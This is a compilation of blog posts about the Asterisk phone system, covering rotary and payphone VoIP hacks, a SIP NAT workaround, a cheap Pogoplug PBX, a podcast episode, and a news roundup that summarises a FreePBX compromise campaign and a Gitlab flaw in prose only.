FLOSS Weekly Episode 777: Asterisk — Wait, Faxes?

This week Jonathan Bennett and David Ruggles sit down with Joshua Colp to talk about Asterisk! That’s the Open Source phone system software you already interact with without realizing it. It started as a side project to run the phones for Linux Support Services, and it turned out working on phone systems was more fun than supporting Linux. The project grew, and in the years since has landed at Sangoma, where Joshua holds the title of Asterisk Project Lead.

Asterisk is used in call centers, business phone systems, and telecom appliances around the world. But how does it handle faxes, WebRTC, and stopping spam calls? Just kidding on that last one, still an unsolved problem.

Continue reading “FLOSS Weekly Episode 777: Asterisk — Wait, Faxes?”

A Dial Phone SIPs Asterisk

An endless source of amusement for those of advancing years can come from handing a rotary phone to a teenager and asking them to dial a number with it. It’s rare for them to be stumped by a piece of technology, after all. [Mnutt]’s 4-year-old son had no such problems when he saw rotary phones at an art exhibition, so what was a parent to do but wire the phone to an Asterisk PBX with shortcut numbers for calls to family and such essential services as a joke line, MTA status, or even a K-pop song.

It’s possible to hook up a pulse dial phone with a SLIC module and a microcontroller, but in this case, a Grandstream SIP box did the trick. These are all-in-one devices that implement a SIP client with a physical connection, and older ones will talk to pulse dialers as well as the more usual tone dialing phones. The phone in question is a vintage American model. Writing this from Europe we were surprised to find a little simpler inside than its transatlantic counterparts of the same era.

An Asterisk install on a Raspberry Pi completed the project, and thus it became a matter of software configuration. It’s a useful run-through for Asterisk dilettantes, even if you haven’t got a 4-year-old. Perhaps you have an old payphone or two!

This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the CVE is a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, and allow end users to set features like Do Not Disturb without having to punch in star codes, or visit a web page. Because of the use case, any FreePBX deployment that supports VoIP phones connecting from outside the network, that use this feature, would need these ports open. The best way to secure that would be to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. There is a surprising amount of obfuscation and stealth features in this family of malware, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to the presses, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping on any of the checks intended to prevent it, you can trivially insert shell code that will be run on the underlying server. Avoiding the traps is a big part of the work to actually make this into an real PoC. Read the post for full details on the debugging journey.

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature, to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings, and make the setting change. Finally!

Convert A Rotary Phone To VOIP Using Raspberry Pi

There’s something so nostalgic about the rotary phone that makes it a fun thing to hack and modernize. [Voidon] put his skills to the test and converted one to VoIP using a Raspberry Pi. He used the RasPi’s GPIO pins to read pulses from the rotary dial – a functional dial is always a welcome feature in rotary phone hacks. An old USB sound card was perfect for the microphone and handset audio.

As with any build, there were unexpected size issues that needed to be worked around. While the RasPi fit inside the case well, there was no room for the USB power jack or an ethernet cable, let alone a USB power bank for portability. The power bank idea was scrapped. [voidon] soldered the power cord to the RasPi before the polyfuse to preserve the surge protection, used a mini-USB wifi dongle, and soldered a new USB connector to the sound card. [Voidon] also couldn’t get the phone’s original ringer to work, so he used the Raspberry Pi’s internal sound card to play ringtones.

The VoIP (SIP) was managed by some Python scripting, available at GitHub. [voidon] has some experience in using Asterisk at his day job, so it will be interesting to see if he incorporates it in the future.

[via Reddit]

 

 

switchboard

Bypassing Broken SIP ALG Implementations

The SIP protocol is commonly used for IP telephone communications. Unfortunately it’s notorious for having issues with NAT traversal. Even some major vendors can’t seem to get it right. [Stephen] had this problem with his Cisco WRVS4400N router. After a bit of troubleshooting, he was able to come up with a workaround that others may find useful.

The router had built in SIP ALG functionality, but it just didn’t work. [Stephen] was trying to route SIP traffic from a phone to an Asterisk PBX system behind the router. The router just couldn’t properly handle these packets regardless of whether SIP ALG was enabled or disabled.

[Stephen] first tried to change the SIP port on the external VOIP phone from the default of 5060 to something else. Then he setup port forwarding on the router to the Asterisk box to forward the traffic to the Asterisk system on the original port. This sort of worked. The calls would go through but they would eventually drop after about 20 seconds.

The only thing that [Stephen] could get to work completely was to change the SIP port in Asterisk’s sip.conf file using the “bindport” directive. He changed it to some random unused high port number. Then he setup port forwarding on the router to forward incoming UDP packets on that port to the Asterisk system. This worked fine, but now all of the original phones behind the router stopped working because they were configured to use the default port of 5060.

Rather than re-configure all of the phones in the organization, [Stephen] made one change on the Asterisk system. He setup an iptables rule to forward all incoming traffic on UDP port 5060 to the new SIP port. Now all of the phones are working with minimal changes across the organization. It’s a lot of hassle to go through just because the router couldn’t handle SIP correctly, but it gets the job done.

phone controller

Breathe New Life Into Payphones With Asterisk

Payphones used to be found on just about every street corner. They were a convenience, now replaced by the ubiquitous mobile phone. These machines were the stomping grounds for many early computer hackers, and as a result hold a place in hacker history. If you’ve ever wanted to re-live the good ol’ days, [hharte’s] project might be for you.

[hharte] has been working to make these old payphones useful again with some custom hardware and software. The project intends to be an interface between a payphone and an Asterisk PBX system. On the hardware side, the controller board is capable of switching various high voltage signals required for coin-line signaling. The controller uses a Teensy microcontroller to detect the hook status as well as to control the relays. The current firmware features are very basic, but functional.

[hharte] also wrote a custom AGI script for Asterisk. This script allows Asterisk to detect the 1700hz and 2200hz tones transmitted when coins are placed into the machine. The script is also in an early stage, but it will prompt for money and then place the call once 25 cents has been deposited. All of the schematics and code can be found on the project’s github page.

[Thanks mies]

Hacking A Pogoplug Into A $20 PBX

The Pogoplug Series 4 is a little network attached device that makes your external drives accessible remotely. Under the hood of this device is an ARM processor running at 800 MHz, which is supported by the Linux kernel. If you’re looking to build your own PBX on the cheap, [Ward] runs us through the process. Since the Pogoplug 4 is currently available for about $20, it’s a cheap way to play with telephony.

Step one is to convert the Pogoplug to Debian, which mostly requires following instructions carefully. After the Pogoplug is booting Debian, the Incredible PBX bundle can be installed. We’ve seen this bundle running on a Raspberry Pi in the past. Incredible PBX’s preconfigured setup based on Asterisk and FreePBX gives a ton of functionality out of the box.

With your $20 PBX running, there’s a lot that can be done. Google’s Voice service allows unlimited free calling to the USA and Canada. With Internet connectivity, you get email notifications for voicemails, and can query WolframAlpha by voice.